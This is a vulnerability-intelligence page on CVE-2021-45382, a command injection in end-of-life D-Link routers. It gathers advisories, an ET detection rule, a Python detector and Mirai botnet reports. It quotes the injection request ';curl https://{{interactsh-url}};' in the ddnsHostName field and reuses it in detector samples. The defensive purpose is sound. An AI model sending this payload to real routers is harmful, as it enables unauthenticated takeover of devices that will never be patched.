CVE-2021-45382
Published 2022-02-17
Priority: P1 · 93 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-25
Exploited in the wild
EPSS: 97.84% (99.9th percentile)
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
Detection & IOCs (extracted from sources)
command: ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}
filename: ncc2
snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/ddns_check.ccp"; fast_pattern; http.request_body; content:"&ddnsHostName="; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:cve,2021-45382; classtype:attempted-admin; sid:2035747; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_05, cve CVE_2021_45382, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_08;)
- Exploit targets HTTP POST requests to the /ddns_check.ccp endpoint; inspect the ddnsHostName parameter for shell metacharacters (;, newline, &, backtick, |, $) appearing immediately after `&ddnsHostName=`, i.e. as the first byte of the value.
- The Nuclei template confirms exploitation via out-of-band HTTP callback (interactsh); look for outbound curl requests originating from D-Link router IPs as a post-exploitation indicator.
- The vulnerability is unauthenticated and network-accessible (CVSS AV:N/AC:L/PR:N); no authentication bypass is required — any POST to /ddns_check.ccp with an injected ddnsHostName is a direct exploitation attempt.
- The ET rule (SID 2035747) is tagged CISA_KEV and classified attempted-admin; deploy at both Perimeter and Internal network segments for full coverage.
- All affected D-Link models (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, DIR-836L) are End-of-Life/End-of-Service; no patch will be issued. Detection is the only mitigation short of device replacement.
- CISA mandates disconnection of affected devices if still in use; passive detection rules alone are insufficient. Asset inventory should be used to identify and isolate these routers.
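As an added defender-side example (not code from this page, Emerging Threats or D-Link), the following Python mirrors the matching logic of ET rule SID 2035747 quoted above and runs it over constructed raw HTTP requests, so the rule's scope and its anchoring on `&ddnsHostName=` can be checked offline; the request samples and the helper names are constructed for this example, and only the ddnsHostName indicator value is taken from the page.

```python
import re

# Added example: reimplements the chained conditions of ET rule SID 2035747
# (CVE-2021-45382) as a request-level check. Samples below are constructed.

# Same byte class as the rule's pcre, tested at the first byte of the value:
# ; \n & ` | $
METACHAR = re.compile(rb"[\x3b\x0a\x26\x60\x7c\x24]")
URI_NEEDLE = b"/ddns_check.ccp"
PARAM_NEEDLE = b"&ddnsHostName="


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, uri, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    method, uri, _version = request_line.split(b" ", 2)
    return method, uri, body


def matches_rule(method: bytes, uri: bytes, body: bytes) -> bool:
    """True when the request satisfies every condition the rule chains:
    POST, URI containing /ddns_check.ccp, and '&ddnsHostName=' in the body
    followed immediately by a shell metacharacter. Every occurrence of the
    parameter is checked, since a later occurrence may carry the injection."""
    if method != b"POST" or URI_NEEDLE not in uri:
        return False
    idx = body.find(PARAM_NEEDLE)
    while idx >= 0:
        value_start = idx + len(PARAM_NEEDLE)
        if METACHAR.match(body, value_start):  # match() is anchored at pos
            return True
        idx = body.find(PARAM_NEEDLE, value_start)
    return False


def check_request(raw: bytes) -> bool:
    return matches_rule(*parse_request(raw))


# Constructed samples. BENIGN is an ordinary DDNS check; SUSPECT carries the
# out-of-band indicator quoted on this page (placeholder URL kept as-is).
HEAD = b"POST /ddns_check.ccp HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
BENIGN = HEAD + b"ccp_act=doCheck&ddnsHostName=myhost.example.net&ddnsUsername=u&ddnsPassword=p"
SUSPECT = HEAD + b"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername=a&ddnsPassword=b"
# Coverage caveat: the rule anchors on '&ddnsHostName=', so a body in which
# ddnsHostName is the first parameter falls outside the rule's scope.
UNANCHORED = HEAD + b"ddnsHostName=;curl https://{{interactsh-url}};&ccp_act=doCheck"
```

The UNANCHORED sample documents a gap in the rule's coverage that an analyst tuning it should be aware of; the example reproduces the rule as written rather than widening it.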
CVSS provenance
- nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- nvd (v2.0): 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- vulncheck: 9.8 CRITICAL
- cisa: 9.8 CRITICAL
GHSA
GHSA-5wgx-qvpv-2353 · ghsa_unreviewed · 2022-02-18 · CVE-2021-45382 [CRITICAL] CWE-77
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
VulnCheck
D-Link Multiple Routers Remote Code Execution Vulnerability · vulncheck · 2021 · CVSS 9.8 · CVE-2021-45382 [CRITICAL] CWE-78
A remote code execution vulnerability exists in all series H/W revisions routers via the DDNS function in ncc2 binary file.
Affected: D-Link Multiple Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Exploitation References:
- https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://www.cs.ucr.edu/~adava003/MalNet_IMC2022.pdf
- https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=c
CISA
D-Link Multiple Routers Remote Code Execution Vulnerability · cisa · 2022-04-04 · CVSS 9.8 · CVE-2021-45382 [CRITICAL] CWE-78
Affected: D-Link Multiple Routers
A remote code execution vulnerability exists in all series H/W revisions routers via the DDNS function in ncc2 binary file.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-45382
Remediation Due Date: 2022-04-25
Suricata
ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382) · suricata · 2022-04-05 · CVSS 9.8 · CVE-2021-45382 [CRITICAL]
Rule: ET rule SID 2035747, quoted in full under Detection & IOCs above.
Nuclei
D-Link - Remote Command Execution · nuclei · CVSS 9.8 · CVE-2021-45382 [CRITICAL]
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file
Template:
id: CVE-2021-45382
info:
  name: D-Link - Remote Command Execution
  author: king-alexander
  severity: critical
  description: |
    A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via command injection in the DDNS function, leading to complete router compromise and control over network traffic.
  remediation: |
    DIR-810L, DIR-820L, DIR-830L, DIR-8
Bleepingcomputer
Mirai DDoS malware variant expands targets with 13 router exploits · blogs_bleepingcomputer · 2023-10-10 · CVSS 9.8 · [CRITICAL]
## Mirai DDoS malware variant expands targets with 13 router exploits
By Bill Toulas
A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.
Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.
IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.
## Extensive IoT targeting
The more devices and vulnerabilities a DDoS malware targets, the greater the potential to build a large and powerful
Fortinet
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs · blogs_fortinet · 2023-10-09 · CVSS 9.8 · [CRITICAL]
FORTIGUARD LABS THREAT RESEARCH
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits
By Cara Lin | October 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
In September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including D-Link devices, Netis wireless router, Sunhillo SureLine, Geutebruck IP camera, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.
Based on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on September 6, with trigger counts ran
Fortinet
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign · blogs_fortinet · 2022-04-01 · CVSS 9.8 · [CRITICAL]
FORTIGUARD LABS THREAT RESEARCH
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
By Joie Salvio and Roy Tay | April 01, 2022
Between February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release.
By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expan
References
- https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-45382
Timeline
- 2022-02-17: Published
- 2022-04-04: Added to CISA KEV
- Exploited in the wild